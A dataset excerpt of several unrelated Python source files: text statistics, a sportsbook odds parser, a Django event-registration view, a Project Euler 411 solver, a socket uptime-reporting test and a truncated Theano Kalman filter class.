[]\n for i in lines:\n pop_phrases.append((i.encode('utf-8').decode('utf-8-sig'))[:-1])\n pop_phrase_num = dict(Counter(pop_phrases))\n for p in pop_phrase_num:\n pop_phrase_num[p] -= 1\n # process\n for p in pop_phrase_num:\n p0 = p\n pattern = re.compile(p0)\n pop_phrase_num[p] += len(pattern.findall(sentence))\n f.close()\n return pop_phrase_num\n\nif __name__ == '__main__':\n print(stc_len('你好,在吗?'))\n print(stc_phrase_count('我今天想吃一个苹果,然后看部film,不知道你是怎么想的呢?哈哈~'))\n print(stc_char_count('我今天想吃一个苹果,然后看部film,不知道你是怎么想的呢?哈哈~'))\n print(stc_digit_count('121221121221,321312434,42432'))\n print(stc_letter_count('dadadadkasjdkladjkwl'))\n print(stc_punct_count(',。、'))\n print(stc_special_words_count('今天的天气好差劲噢~'))\n print(stc_pop_phrase_count1('如果我有freestyle的话,惊不惊喜?')) #won't find \"惊不惊喜\"\n print(stc_pop_phrase_count2('如果我有freestyle的话,惊不惊喜?')) #will fild \"惊不惊喜\"\n\n", "sub_path": "statistical_analysis/statistical_analysis.py", "file_name": "statistical_analysis.py", "file_ext": "py", "file_size_in_byte": 5645, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "jieba.lcut", "line_number": 42, "usage_type": "call"}, {"api_name": "collections.Counter", "line_number": 43, "usage_type": "call"}, {"api_name": "collections.Counter", "line_number": 48, "usage_type": "call"}, {"api_name": "collections.Counter", "line_number": 55, "usage_type": "call"}, {"api_name": "string.digits", "line_number": 55, "usage_type": "attribute"}, {"api_name": "collections.Counter", "line_number": 69, "usage_type": "call"}, {"api_name": "string.ascii_letters", "line_number": 69, "usage_type": "attribute"}, {"api_name": "collections.Counter", "line_number": 84, "usage_type": "call"}, {"api_name": "jieba.posseg.lcut", "line_number": 98, "usage_type": "call"}, {"api_name": "jieba.posseg", "line_number": 98, "usage_type": "attribute"}, {"api_name": "collections.Counter", "line_number": 118, "usage_type": "call"}, {"api_name": "jieba.lcut", "line_number": 122, "usage_type": "call"}, {"api_name": "collections.Counter", "line_number": 140, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 146, "usage_type": "call"}]} +{"seq_id": "599217139", "text": "import datetime\n\nimport requests\nimport pytz\n\nfrom .fivethirtyeight_parser import NBA_TEAM_NAMES, MLB_TEAM_NAMES\n\n\nMYBOOKIE_URL = (\n \"https://mybookie.ag/wp-content/plugins/\"\n \"wp_plugin_sportsbook_guest/lines.php\"\n)\n\n\ndef parse_nba_game_data():\n \"\"\"\n Parse NBA game data from MyBookie website.\n \"\"\"\n # leagues specifies the id of the league to retrieve data from (nba=3)\n form_data = {\"leagues\": 3, \"bookID\": 35}\n json_data = requests.post(MYBOOKIE_URL, data=form_data).json()\n league_id = json_data[0][\"id_league\"]\n sport_id = json_data[0][\"id_sport\"]\n content = json_data[0][\"content\"]\n cleaned_data = []\n for item in content:\n # Not all items in content contain game data. Skip those that don't.\n game_id = item.get(\"id_game\")\n if game_id is None:\n print(\"No game id found. Skipping.\")\n continue\n else:\n print(\"Parsing game with id\", game_id)\n\n away_team_name = item[\"visitor_team\"]\n home_team_name = item[\"home_team\"]\n\n away_odds = item[\"lines\"][0][\"visitor_odds_t\"]\n home_odds = item[\"lines\"][0][\"home_odds_t\"]\n\n if away_odds == '':\n away_odds = 0\n\n if home_odds == '':\n home_odds = 0\n\n game_cleaned = dict(\n game_id=game_id,\n away_team_name = away_team_name,\n home_team_name = home_team_name,\n game_date=item[\"game_date\"],\n game_time=item[\"game_time\"],\n game_datetime=item[\"game_date_time\"][\"date\"],\n game_tz=item[\"game_date_time\"][\"timezone\"],\n away_odds=away_odds,\n home_odds=home_odds,\n over_total=item[\"lines\"][0][\"over_total\"],\n over_odds_total=item[\"lines\"][0][\"over_odds_total\"],\n under_total=item[\"lines\"][0][\"under_total\"],\n under_odds_total=item[\"lines\"][0][\"under_odds_total\"],\n away_spread=item[\"lines\"][0][\"visitor_spread_t\"],\n away_spread_odds=item[\"lines\"][0][\"visitor_spread_odds_t\"],\n home_spread=item[\"lines\"][0][\"home_spread_t\"],\n home_spread_odds=item[\"lines\"][0][\"home_spread_odds_t\"]\n )\n cleaned_data.append(game_cleaned)\n return cleaned_data\n\n\ndef parse_mlb_game_data():\n \"\"\"\n Parse MLB game data from MyBookie website.\n \"\"\"\n # leagues specifies the id of the league to retrieve data from (mlb=5)\n form_data = {\"leagues\": 5, \"bookID\": 35}\n json_data = requests.post(MYBOOKIE_URL, data=form_data).json()\n league_id = json_data[0][\"id_league\"]\n sport_id = json_data[0][\"id_sport\"]\n content = json_data[0][\"content\"]\n cleaned_data = []\n for item in content:\n game_id = item.get(\"id_game\")\n if game_id is None:\n print(\"No game id found. Skipping.\")\n continue\n else:\n print(\"Parsing game with id\", game_id)\n\n away_team_code, *away_name = item[\"visitor_team\"].split(\" \")\n home_team_code, *home_name = item[\"home_team\"].split(\" \")\n\n # TODO: Make this not dumb\n if away_team_code == \"SFO\":\n away_team_code = \"SF\"\n\n if home_team_code == \"SFO\":\n home_team_code = \"SF\"\n\n if away_team_code == \"NY\":\n away_team_code = \"NYM\"\n\n if home_team_code == \"NY\":\n home_team_code = \"NYM\"\n\n if away_team_code == \"WAS\":\n away_team_code = \"WSH\"\n\n if home_team_code == \"WAS\":\n home_team_code = \"WSH\"\n\n if away_team_code == \"SDG\":\n away_team_code = \"SD\"\n\n if home_team_code == \"SDG\":\n home_team_code = \"SD\"\n\n if away_team_code == \"LA\":\n if \"DODGERS\" in away_name:\n away_team_code = \"LAD\"\n elif \"ANGELS\" in away_name:\n away_team_code = \"LAA\"\n\n if home_team_code == \"LA\":\n if \"DODGERS\" in home_name:\n home_team_code = \"LAD\"\n elif \"ANGELS\" in home_name:\n home_team_code = \"LAA\"\n\n if away_team_code == \"CHI\":\n away_team_code = \"CHW\"\n\n if home_team_code == \"CHI\":\n home_team_code = \"CHW\"\n\n if away_team_code == \"TAM\":\n away_team_code = \"TB\"\n\n if home_team_code == \"TAM\":\n home_team_code = \"TB\"\n\n if away_team_code == \"KAN\":\n away_team_code = \"KC\"\n\n if home_team_code == \"KAN\":\n home_team_code = \"KC\"\n\n away_team_name = MLB_TEAM_NAMES[away_team_code]\n home_team_name = MLB_TEAM_NAMES[home_team_code]\n\n away_odds = item[\"lines\"][0][\"visitor_odds_t\"]\n home_odds = item[\"lines\"][0][\"home_odds_t\"]\n over_total = item[\"lines\"][0][\"over_total\"]\n over_odds_total = item[\"lines\"][0][\"over_odds_total\"]\n under_total = item[\"lines\"][0][\"under_total\"]\n under_odds_total = item[\"lines\"][0][\"under_odds_total\"]\n away_spread = item[\"lines\"][0][\"visitor_spread_t\"]\n away_spread_odds = item[\"lines\"][0][\"visitor_spread_odds_t\"]\n home_spread = item[\"lines\"][0][\"home_spread_t\"]\n home_spread_odds = item[\"lines\"][0][\"home_spread_odds_t\"]\n\n if away_odds == '':\n away_odds = 0\n\n if home_odds == '':\n home_odds = 0\n\n if away_spread == '':\n away_spread = 0\n\n if home_spread == '':\n home_spread = 0\n\n if away_spread_odds == '':\n away_spread_odds = 0\n\n if home_spread_odds == '':\n home_spread_odds = 0\n\n game_cleaned = dict(\n game_id=game_id,\n away_team_name=away_team_name,\n home_team_name=home_team_name,\n game_date=item[\"game_date\"],\n game_time=item[\"game_time\"],\n game_datetime=item[\"game_date_time\"][\"date\"],\n game_tz=item[\"game_date_time\"][\"timezone\"],\n away_pitcher=item[\"visitor_pitcher\"],\n home_pitcher=item[\"home_pitcher\"],\n away_odds=away_odds,\n home_odds=home_odds,\n over_total=over_total,\n over_odds_total=over_odds_total,\n under_total=under_total,\n under_odds_total=under_odds_total,\n away_spread=away_spread,\n away_spread_odds=away_spread_odds,\n home_spread=home_spread,\n home_spread_odds=home_spread_odds\n )\n cleaned_data.append(game_cleaned)\n return cleaned_data\n\n", "sub_path": "parsers/mybookie_parser.py", "file_name": "mybookie_parser.py", "file_ext": "py", "file_size_in_byte": 6430, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "requests.post", "line_number": 21, "usage_type": "call"}, {"api_name": "requests.post", "line_number": 76, "usage_type": "call"}, {"api_name": "fivethirtyeight_parser.MLB_TEAM_NAMES", "line_number": 147, "usage_type": "name"}, {"api_name": "fivethirtyeight_parser.MLB_TEAM_NAMES", "line_number": 148, "usage_type": "name"}]} +{"seq_id": "156154017", "text": "from django.shortcuts import render, redirect\nfrom .import forms\nfrom .models import Eventreg\n\n\ndef Eventregister(request):\n login_id = request.session['logid']\n model_object = Eventreg.objects.filter(id=login_id)\n\n if request.method == 'POST':\n form = forms.EventregForm(request.POST, request.FILES)\n if form.is_valid():\n regobj = form.cleaned_data\n eventid = regobj['event_id']\n eventregno = regobj['event_reg_no']\n a = Eventreg(event_id=eventid, event_reg_no=eventregno, id=login_id)\n a.save()\n return redirect('eventreg:EventregForm')\n else:\n form = forms.EventregForm\n return render(request, \"eventreg/eventreg.html\", {'form': form, 'data': model_object})\n\n\n", "sub_path": "Festhub/eventreg/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 762, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "models.Eventreg.objects.filter", "line_number": 8, "usage_type": "call"}, {"api_name": "models.Eventreg.objects", "line_number": 8, "usage_type": "attribute"}, {"api_name": "models.Eventreg", "line_number": 8, "usage_type": "name"}, {"api_name": "models.Eventreg", "line_number": 16, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 18, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 21, "usage_type": "call"}]} +{"seq_id": "346591113", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\n1 1 1\n13 6 8\n167 162 6\n266 11 256\n2500 2500 2500\n653 167 13\n14406 7203 14406\n8207 16 8192\n39376 39366 11\n5005 2505 5000\n146410 146410 6655\n20746 172 261\n342732 342732 85683\n57629 7208 57624\n202505 202500 2505\n262164 21 262144\n1336336 668168 1336336\n157474 39371 18\n2345778 2345778 2345778\n160010 2510 160000\n388967 388962 14411\n585645 146415 53240\n3078251 3078251 3078251\n663567 177 8197\n7812500 7812500 7812500\n685469 342737 685464\n9565953 9565938 16\n1843978 7213 1843968\n19803868 19803868 19803868\n405005 202505 5005\n\n\n1 (1, 1) (1, 1)\n2 (1, 5) (8, 0)\n3 (162, 0) (1, 5)\n4 (1, 10) (256, 0)\n5 (2500, 0) (2500, 0)\n6 (162, 5) (8, 5)\n7 (7203, 0) (14406, 0)\n8 (1, 15) (8192, 0)\n9 (39366, 0) (1, 10)\n10 (2500, 5) (5000, 0)\n11 (146410, 0) (6655, 0)\n12 (162, 10) (256, 5)\n13 (342732, 0) (85683, 0)\n14 (7203, 5) (57624, 0)\n15 (202500, 0) (2500, 5)\n16 (1, 20) (262144, 0)\n17 (668168, 0) (1336336, 0)\n18 (39366, 5) (8, 10)\n\n[(1, 1),\n (2, 13),\n (3, 167),\n (4, 266),\n (5, 2500),\n (6, 653),\n (7, 14406),\n (8, 8207),\n (9, 39376),\n (10, 5005),\n (11, 146410),\n (12, 20746),\n (13, 342732),\n (14, 57629),\n (15, 202505),\n (16, 262164),\n (17, 1336336),\n (18, 157474),\n (19, 2345778),\n (20, 160010),\n (21, 388967),\n (22, 585645),\n (23, 3078251),\n (24, 663567),\n (25, 7812500),\n (26, 685469),\n (27, 9565953),\n (28, 1843978),\n (29, 19803868),\n (30, 405005)]\n\nhttps://oeis.org/A220024\n\nCreated on Wed Feb 7 05:12:39 2018\n@author: mbh\n\"\"\"\nfrom __future__ import division, print_function, unicode_literals\n\nimport matplotlib.pyplot as plt\nimport itertools\nimport numpy as np\nimport math\nimport time\nimport bisect\nimport numba as nb\n\ndef p411(N):\n t0=time.clock()\n total=0 \n \n for n in range(2,N+1):\n t=time.clock()\n l2,m2=cycle(2,n**5)\n l3,m3=cycle(3,n**5) \n ndistinct=max(m3,m2)+l2*l3//math.gcd(l2,l3)\n p=points(n**5,ndistinct)\n newVal=lndss(p)\n total += newVal\n print(\"%2d %8d %6.3f %6.3f\" % (n,newVal,time.clock()-t,time.clock()-t0))\n print(1+total)\n print(time.clock()-t0)\n\n\n#https://stackoverflow.com/questions/2631726/how-to-determine-the-longest-increasing-subsequence-using-dynamic-programming\n# find length of longest non-decreasing subsequence of list X\ndef lndss(X):\n if len(X)==0: return 0\n S=[X[0]]\n for i in range(1,len(X)):\n if X[i]>=S[-1]:\n S.append(X[i])\n else:\n index=bisect.bisect_right(S,X[i])\n# print(index,len(S),X[i],S)\n S[index]=X[i]\n return len(S)\n \n#returns smallest k for which gcd(a^k,m)=gcd(a^(k+1),m)\n#@nb.jit(nopython=True) \ndef k0(a,m):\n \n dk,k=0,0\n while 1:\n dknew=math.gcd(a**k,m)\n if dknew==dk:\n return k-1\n dk=dknew\n k+=1\n\n#returns cyle period and offset of a^k mod m\ndef cycle(a,m):\n \n k=k0(a,m)\n for d in sorted(divisors(et(m))):\n if pow(a,k,m)==pow(a,k+d,m):\n# if (a**k)%m==(a**(k+d))%m:\n return d,k\n\n#find the points (2^i mod n, 3^i mod n) for 0<=i<=2n\n@nb.jit(nopython=True)\ndef points(n,ndistinct):\n \n# pairs=[]\n pairs = [(0,0)]*ndistinct#[None for x in range(ndistinct)]\n# pairs=np.array(ndistinct,dtype=np.int64)\n# pairs=np.zeros((ndistinct,2),dtype=np.int64)\n for i in range(ndistinct):\n# newx=(2**i)%n#pow(2,i,n)\n# newy=(3**i)%n#pow(3,i,n)\n# newx=pow(2,i,n)\n# newy=pow(3,i,n)\n newx=f(2,i,n)\n newy=f(3,i,n)\n \n \n# pairs[i]=(newx,newy)\n pairs[i]=(newx,newy)\n \n# return\n# pairs.append((newx,newy))\n\n return [y for x,y in sorted(pairs)]\n\n#modular exponentiation: find x^e mod m\n@nb.jit(nopython=True)\ndef f(x,e,m):\n X = x\n E = e\n Y = 1\n while E > 0:\n if E % 2 == 0:\n X = (X * X) % m\n E = E/2\n else:\n Y = (X * Y) % m\n E = E - 1\n return Y\n \ndef test(n):\n y=points (n)\n t=time.clock()\n# y=points (n)\n l=myGlss(y)\n print(l,time.clock()-t)\n t=time.clock()\n# y=S(n)\n l=get_longest_increasing_subsequence_length(y)\n print(l,time.clock()-t) \n\ndef xp():\n t=time.clock()\n# cycles=[]\n for k in range(2,31):\n \n et2=cycle(2,k**5,1)\n et3=cycle(3,k**5,1)\n \n print(k,et2,et3)\n print(time.clock()-t)\n\n\n#returns cycle length and offset fo k^i mod n\ndef cycle_v1(k,n,x0):\n \n f =lambda i,n: (k*i)%n\n# f = lambda x,n: (n*0 + x * x + 1) % 255\n lam, mu = brent(f, x0,n) \n# print(\"Cycle length: %d\" % lam)\n# print(\"Cycle start index: %d\" % mu) \n# print(list(itertools.islice(iterate(f, x0,n), mu, mu+lam)))\n \n return lam,mu\n \n#from Rosetta Code\n#https://rosettacode.org/wiki/Cycle_detection#Python\n\nimport itertools \ndef brent_length(f, x0,n):\n # main phase: search successive powers of two\n hare = x0\n power = 1\n while True:\n tortoise = hare\n for i in range(1, power+1):\n hare = f(hare,n)\n if tortoise == hare:\n return i\n power *= 2\n \ndef brent(f, x0,n):\n lam = brent_length(f, x0,n)\n \n # Find the position of the first repetition of length lam\n mu = 0\n hare = x0\n for i in range(lam):\n # range(lam) produces a list with the values 0, 1, ... , lam-1\n hare = f(hare,n)\n# print(i,hare)\n # The distance between the hare and tortoise is now lam.\n \n # Next, the hare and tortoise move at same speed until they agree\n tortoise = x0\n while tortoise != hare:\n tortoise = f(tortoise,n)\n hare = f(hare,n)\n mu += 1\n \n return lam, mu\n \ndef iterate(f, x0,n):\n while True:\n yield x0\n x0 = f(x0,n)\n \n#if __name__ == '__main__':\n# f = f=lambda i,n: (2**i) %n\n# x0,n = 0,22\n# lam, mu = brent(f, x0,n)\n# print(\"Cycle length: %d\" % lam)\n# print(\"Cycle start index: %d\" % mu)\n# print(\"Cycle: %s\" % list(itertools.islice(iterate(f, x0,n), mu, mu+lam)))\n \n@nb.jit(nopython=True) \ndef et(n):\n \"\"\"returns Euler totient (phi) of n \"\"\" \n phi=n\n pfs=set(prime_factors(n))\n for pf in pfs:\n phi*=(1-1/pf)\n return int(phi)\n\n#@nb.jit(nopython=True)\ndef divisors(n):\n \"\"\"returns the divisors of n\"\"\"\n #first get the prime factors\n i = 2\n fs = {}\n while i * i <= n:\n if n % i:\n i += 1\n else:\n n //= i\n fs[i]=fs.get(i,0)+1\n if n > 1:\n fs[n]=fs.get(n,0)+1\n \n ps=[k for k,v in fs.items()] #prime factors\n es=[v for k,v in fs.items()] #exponents \n \n divs=[]\n nfactors = len(ps)\n f = [0] * nfactors\n while True:\n p=1\n pfs=[x**y for (x,y) in zip(ps,f)]\n for i in range(len(ps)):\n p*=pfs[i]\n divs.append(p)\n#could use this from np, but is several times slower for large numbers\n# yield ft.reduce(lambda x, y: x*y, [factors[x][0]**f[x] for x in range(nfactors)], 1)\n i = 0\n while True:\n f[i] += 1\n if f[i] <= es[i]:\n break\n f[i] = 0\n i += 1\n if i >= nfactors:\n return divs \n\n@nb.jit(nopython=True)\ndef prime_factors(n):\n \"\"\"returns the prime factors of n\"\"\" \n i = 2\n factors = []\n while i * i <= n:\n if n % i:\n i += 1\n else:\n n //= i\n factors.append(i)\n if n > 1:\n factors.append(n)\n return factors \n\ndef radixsort( aList ):\n RADIX = 10\n maxLength = False\n tmp , placement = -1, 1\n \n while not maxLength:\n maxLength = True\n # declare and initialize buckets\n buckets = [list() for _ in range( RADIX )]\n \n # split aList between lists\n for i in aList:\n tmp = i[1] / placement\n buckets[tmp % RADIX].append( i[1] )\n if maxLength and tmp > 0:\n maxLength = False\n \n # empty lists into aList array\n a = 0\n for b in range( RADIX ):\n buck = buckets[b]\n for i in buck:\n aList[a] = i[1]\n a += 1\n \n # move to next digit\n placement *= RADIX\n \n\n#import time, bisect\n\n\ndef generate_points(n):\n if n == 1: return [[0]]\n points = [None for x in range(n)]\n x = 1; y = 1\n points[x] = y\n while True:\n x = (3 * x) % n\n y = (2 * y) % n\n ys = points[x]\n if ys is None:\n points[x] = y\n elif type(ys) is int:\n if y == ys:\n break\n points[x] = {y, ys}\n else:\n if y in ys:\n break\n ys.add(y)\n return(points)\n\ndef find_path(points):\n s = []\n for ys in points:\n if type(ys) is int:\n ix = bisect.bisect_right(s, ys)\n if ix >= len(s):\n s.append(ys)\n else:\n s[ix] = ys\n elif ys is not None:\n ix = 0\n for y in sorted(ys):\n ix = bisect.bisect_right(s, y, lo=ix)\n if ix >= len(s):\n s.append(y)\n else:\n s[ix] = y\n return len(s)\n\ndef t411(n):\n sigma = 0\n t0 = time.time()\n for k in range(1, n + 1):\n t1 = time.time()\n points = generate_points(k**5)\n t2 = time.time()\n s = find_path(points)\n sigma += s\n t3 = time.time()\n print(\"%2d %8d %8d %6.3f %6.3f %6.3f\" % (k, sigma, s, t2 - t1, t3 - t2, t3 - t0))\n return sigma\n\n#https://gist.github.com/JonathanSpeek/1f4c7c283c7c3c475ee13d57381765d8\ndef binary_search(a_list, item):\n \"\"\"Performs iterative binary search to find the position of an integer in a given, sorted, list.\n a_list -- sorted list of integers\n item -- integer you are searching for the position of\n \"\"\"\n\n first = 0\n last = len(a_list) - 1\n\n while first <= last:\n i = (first + last) // 2\n\n if a_list[i] == item:\n return i\n# return '{item} found at position {i}'.format(item=item, i=i)\n elif a_list[i] > item:\n last = i - 1\n elif a_list[i] < item:\n first = i + 1\n else:\n print( '{item} not found in the list'.format(item=item))", "sub_path": "PE_0411/PE_0411.py", "file_name": "PE_0411.py", "file_ext": "py", "file_size_in_byte": 9953, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "time.clock", "line_number": 102, "usage_type": "call"}, {"api_name": "time.clock", "line_number": 106, "usage_type": "call"}, {"api_name": "math.gcd", "line_number": 109, "usage_type": "call"}, {"api_name": "time.clock", "line_number": 113, "usage_type": "call"}, {"api_name": "time.clock", "line_number": 115, "usage_type": "call"}, {"api_name": "bisect.bisect_right", "line_number": 127, "usage_type": "call"}, {"api_name": "math.gcd", "line_number": 138, "usage_type": "call"}, {"api_name": "numba.jit", "line_number": 154, "usage_type": "call"}, {"api_name": "numba.jit", "line_number": 179, "usage_type": "call"}, {"api_name": "time.clock", "line_number": 195, "usage_type": "call"}, {"api_name": "time.clock", "line_number": 198, "usage_type": "call"}, {"api_name": "time.clock", "line_number": 199, "usage_type": "call"}, {"api_name": "time.clock", "line_number": 202, "usage_type": "call"}, {"api_name": "time.clock", "line_number": 205, "usage_type": "call"}, {"api_name": "time.clock", "line_number": 213, "usage_type": "call"}, {"api_name": "numba.jit", "line_number": 278, "usage_type": "call"}, {"api_name": "numba.jit", "line_number": 326, "usage_type": "call"}, {"api_name": "bisect.bisect_right", "line_number": 398, "usage_type": "call"}, {"api_name": "bisect.bisect_right", "line_number": 406, "usage_type": "call"}, {"api_name": "time.time", "line_number": 415, "usage_type": "call"}, {"api_name": "time.time", "line_number": 417, "usage_type": "call"}, {"api_name": "time.time", "line_number": 419, "usage_type": "call"}, {"api_name": "time.time", "line_number": 422, "usage_type": "call"}]} +{"seq_id": "319030651", "text": "import socket\nimport sys\nimport datetime\nimport time\n\n#inspired by http://planzero.org/blog/2012/01/26/system_uptime_in_python,_a_better_way\ndef uptime():\n\twith open('/proc/uptime','r') as f:\n\t\tuptime_seconds = float(f.readline().split()[0])\n\t\treturn str(uptime_seconds)\n\n\n#create an INET, STREAMing socket\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\n#now connect\ns.connect(('colton.cybernetics.ro',8888))\n\n#mysql seems to expect YYYY-MM-DD HH:MM:SS.SSSSSS\n#s.send(str(datetime.datetime.now().time()))\ns.send(\"'\" + datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S.%f\") + \"',1,\" + uptime())\n\ntime.sleep(2)\n\nresponse = s.recv(1024)\n\nprint(response)\n\ns.close()\n", "sub_path": "wirfi-device-backup/python/socketTest.py", "file_name": "socketTest.py", "file_ext": "py", "file_size_in_byte": 672, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "socket.socket", "line_number": 14, "usage_type": "call"}, {"api_name": "socket.AF_INET", "line_number": 14, "usage_type": "attribute"}, {"api_name": "socket.SOCK_STREAM", "line_number": 14, "usage_type": "attribute"}, {"api_name": "datetime.datetime.now", "line_number": 21, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 21, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 23, "usage_type": "call"}]} +{"seq_id": "91536382", "text": "import numpy as np\nimport theano\nimport theano.tensor as tt\n\nfrom pymc3.distributions import Continuous\n\nsolve_l = tt.slinalg.solve_lower_triangular\nsolve_u = tt.slinalg.solve_upper_triangular\n\n__all__ = ['KalmanTheano', 'KalmanFilter']\n\n\nclass DimensionalityError(Exception):\n pass\n\n\ndef _filter(y, Phi, Q, L, c, H, Sv, d, s, P):\n \"\"\"\n Perform 1 filtering step. The previous state estimates and log likelihood\n up to the previous time step being given by (s, P). The rest of\n the arguments are parameters for the state space model.\n \"\"\"\n s_fwd, P_fwd, y_est, y_est_var = _predict(s, P, Phi, Q, L, c, H, Sv, d)\n\n # Cholesky factor and estimation error\n Ly_est_var = tt.slinalg.cholesky(y_est_var)\n err = y - y_est\n\n # make corrections\n s_cor, P_cor = _correct(s_fwd, Ly_est_var, err, P_fwd, Phi, H)\n\n # Accumulate loglikelihood\n log_l = _log_likelihood(err, Ly_est_var)\n return s_cor, P_cor, log_l\n\n\ndef _predict(s, P, Phi, Q, L, c, H, Sv, d):\n \"\"\"\n Kalman filter prediction step\n \"\"\"\n # State propogation\n s_fwd = tt.dot(Phi, s) + c\n P_fwd = tt.dot(tt.dot(Phi, P), Phi.T) + tt.dot(tt.dot(L, Q), L.T)\n\n # Output estimate and uncertainty\n y_est = tt.dot(H, s_fwd) + d\n y_est_var = tt.dot(tt.dot(H, P_fwd), H.T) + Sv\n return s_fwd, P_fwd, y_est, y_est_var\n\n\ndef _correct(s_fwd, Ly, err, P_fwd, Phi, H):\n K = tt.dot(P_fwd, solve_u(Ly.T, solve_l(Ly, H)).T)\n s_cor = s_fwd + tt.dot(K, err)\n KL = tt.dot(K, Ly)\n P_cor = P_fwd - tt.dot(KL, KL.T)\n return s_cor, P_cor\n\n\ndef _log_likelihood(err, Ly):\n n = err.shape[0] # Number of dimensions\n\n logdet = tt.log(tt.diag(Ly)).sum()\n vTSv = tt.nlinalg.norm(solve_l(Ly, err), 2)**2\n return -0.5 * (n * np.log(2 * np.pi) + logdet + vTSv)\n\n\nclass KalmanTheano(object):\n def __init__(self, Phi, Q, L, c, H, Sv, d, s0, P0, n, m, g):\n # NOTE: If identical matrices happen to be passed in, theano\n # NOTE: will recognize this can use references. This can be\n # NOTE: confusing as the names given below need not \"stick\".\n\n # State transition\n self.Phi = tt.as_tensor_variable(Phi, name=\"Phi\")\n\n # State innovations\n self.Q = tt.as_tensor_variable(Q, name=\"Q\")\n\n # Innovations modifier\n self.L = tt.as_tensor_variable(L, name=\"L\")\n\n # State structural component\n self.c = tt.as_tensor_variable(c, name=\"c\")\n\n # Observation matrix\n self.H = tt.as_tensor_variable(H, name=\"H\")\n\n # Observation noise variance\n self.Sv = tt.as_tensor_variable(Sv, name=\"Sv\")\n\n # Observation structural component\n self.d = tt.as_tensor_variable(d, name=\"d\")\n\n # Initial state mean\n self.s0 = tt.as_tensor_variable(s0, name=\"s0\")\n\n # Initial state variance\n self.P0 = tt.as_tensor_variable(P0, name=\"P0\")\n\n self.n = n # Output dimension\n self.m = m # State dimension\n self.g = g # Innovations dimension (often m == g)\n\n self.tensors = [self.Phi, self.Q, self.L, self.c,\n self.H, self.Sv, self.d]\n self.tensor_names = [\"Phi\", \"Q\", \"L\", \"c\",\n \"H\", \"Sv\", \"d\"]\n self.tensor_dims = [2, 2, 2, 1, 2, 2, 1] # Matrix or vector\n\n self._validate()\n return\n\n def _validate(self):\n sequences = []\n non_sequences = []\n\n def is_seq(tnsr, dim=1):\n ndim = tnsr.ndim\n if ndim == dim:\n return False\n elif ndim == dim + 1:\n return True\n else:\n raise DimensionalityError(\n \"Variable {} has {} dimensions, but \"\n \"should have only {} or {}\"\n \"\".format(tnsr.name, ndim, dim, dim + 1))\n\n def append_seq(name, tnsr, expected_dim=1):\n if is_seq(tnsr, dim):\n sequences.append((tnsr, name))\n else:\n non_sequences.append((tnsr, name))\n\n for name, tnsr, dim in zip(self.tensor_names,\n self.tensors,\n self.tensor_dims):\n append_seq(name, tnsr, dim)\n\n self.sequences = sequences\n self.non_sequences = non_sequences\n return\n\n def filter(self, Y, **th_scan_kwargs):\n # Create function with correct ordering for scan\n fn = eval(\n \"lambda {}: _filter(y, Phi, Q, L, c, H, Sv, d, s, P)\"\n \"\".format(\",\".join(\n [\"y\"] +\n [tnsr_name[1] for tnsr_name in self.sequences] +\n [\"s\", \"P\"] +\n [tnsr_name[1] for tnsr_name in self.non_sequences])))\n\n (st, Pt, log_l), updates = theano.scan(\n fn=fn,\n sequences=[Y] + [tnsr_name[0] for tnsr_name in self.sequences],\n outputs_info=[dict(initial=self.s0),\n dict(initial=self.P0),\n None],\n non_sequences=[tnsr_name[0] for tnsr_name in self.non_sequences],\n strict=True,\n **th_scan_kwargs)\n return (st, Pt, log_l.sum()), updates\n\n\nclass KalmanFilter(Continuous):\n \"\"\"\n Implements a generic Kalman filter in general state space form.\n\n Shape of the input tensors is given as a function of:\n\n * T: number of time steps,\n * n: size of the observation vector\n * m: size of the state vector\n * g: size of the disturbance vector in the transition equation\n\n The following rules define tensor dimension reductions allowed:\n\n * If a tensor is time-invariant, the time dimension T can be omitted\n * If n=1, all dimensions of size n can be omitted\n * If m=1 and g=1, all dimensions of size m and g can be omitted\n\n Parameters\n ----------\n Phi : tensor or numpy array, dimensions T x m x m\n Tensor relating the state vectors at times t - 1, t\n c : tensor or numpy array, dimensions T x m\n offset in the state transition equation\n Q : tensor or numpy array, dimensions T x g x g\n Covariance matrix of the disturbances in the transition equation\n L : tensor or numpy array, dimensions T x m x g\n Tensor applying transition equation disturbances to state space\n H : tensor or numpy array, dimensions T x n x m\n Tensor relating observation and state vectors\n d : tensor or numpy array, dimensions T x n\n Shift in the observation equation\n Sv : tensor or numpy array, dimensions T x n x n\n Covariance for the observation noise\n s0 : tensor or numpy array, dimensions n\n Mean of the initial state vector\n P0 : tensor or numpy array, dimensions n x n\n Covariance of the initial state vector\n *args, **kwargs\n Extra arguments passed to :class:`Continuous` initialization\n\n Notes\n -----\n\n The general state space form (SSF) applies to a multivariate time series,\n y(t), containing n elements. We suppose that there is some underlying\n or background \"state\" s(t) containing m elements:\n\n .. math :\n\n s(t) = Phi(t) s(t-1) + c(t) + L(t) \\\\w(t)\\\\,\\\\qquad\n \\\\w(t) \\\\sim \\\\mathcal{N}_g(0, Q(t))\\\\\n s(0) \\\\sim \\\\mathcal{N}_m(s0, P0)\n\n These state variables generate the data via the \"observation\" equations:\n\n .. math :\n\n y(t) = H(t) s(t) + d(t) + \\\\v(t)\\\\,\\\\qquad\n \\\\v(t) \\\\sim \\\\mathcal{N}_n(0, Sv(t))\\\\ ,\n\n Although s(t) is typically not observable, its dynamics are governed by a\n first-order Gauss-Markov process. The entire model is amenable to\n exact inference.\n\n The matrix L (which would correspond to a cholesky factor of the state\n variance if Q = I) can be used to linearly transform the state innovations\n w(t) and can be useful for modelling low-rank innovations.\n \"\"\"\n 